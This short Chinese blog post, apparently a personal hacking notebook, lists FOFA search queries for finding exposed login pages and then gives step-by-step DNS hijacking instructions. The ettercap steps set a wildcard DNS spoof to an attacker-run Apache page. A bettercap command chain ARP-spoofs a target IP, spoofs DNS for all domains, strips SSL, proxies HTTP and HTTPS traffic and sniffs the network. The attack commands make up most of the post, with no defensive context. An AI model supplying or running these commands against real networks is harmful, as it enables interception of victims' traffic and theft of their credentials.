搜索引擎FOFA:
用法:
js1、body="login"&&title="login"&&city="guangzhou"&&port="80"&&server="ubuntu"
2、body="login"||country="us"
DNS劫持:
ettercap: 安装ettercap sudo apt install ettercap 2、修改eetercap dns 地址 cd /etc/ettercap ls vim ettercap.dns 添加地址: * A IP 3、启动apache服务 cd /var/www/html vim index.html services apache2 start 4、ettercap -G bettercap: net.probe on set arp.spoof.targets 192.168.1.13 arp.spoof on set dns.spoof.all true set dns.spoof.address 192.168.1.9 set dns.spoof.domains * dns.spoof on set http.proxy.sslstrip true http.proxy on https.proxy on net.sniff on events.stream on
本文作者:寒江孤影
本文链接:
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!